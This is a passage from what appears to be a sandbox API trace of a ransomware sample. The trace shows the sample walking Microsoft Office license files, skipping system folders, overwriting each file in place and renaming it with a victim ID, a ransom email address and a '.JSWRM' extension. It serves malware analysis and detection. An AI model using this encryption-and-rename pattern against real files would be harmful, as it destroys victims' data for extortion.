lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0108.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0108.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0108.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0108.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0108.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.444] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.445] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9d977b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9d977b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9e300f0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ded, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PR4B5F~1.XRM")) returned 1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0108.445] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0108.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0108.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0108.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0108.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0108.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0108.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0108.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.446] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19949) returned 1 [0108.446] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0108.446] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0108.450] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.450] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0108.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.450] CloseHandle (hObject=0x45c) returned 1 [0108.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0108.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0108.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0108.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0108.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0108.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.450] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0108.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0108.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.451] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9d714db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9d714db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9e09eee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_Retail-pl.xrm-ms", cAlternateFileName="PRECFB~1.XRM")) returned 1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.451] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.452] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.452] lstrcmpiW (lpString1="ProjectStdR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0108.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0108.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0108.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2413d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0108.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0108.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0108.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0108.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0108.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.453] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0108.453] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0108.453] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0108.456] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.456] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0108.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.456] CloseHandle (hObject=0x45c) returned 1 [0108.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0108.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0108.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0108.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0108.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0108.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0108.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0108.458] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9d4b270, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9d4b270, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9de3c89, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_Retail-ppd.xrm-ms", cAlternateFileName="PR062C~1.XRM")) returned 1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.458] lstrcmpiW (lpString1="ProjectStdR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0108.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0108.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0108.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0108.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0108.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0108.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0108.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.459] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20782) returned 1 [0108.459] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0108.459] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0108.463] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.463] WriteFile (in: hFile=0x45c, 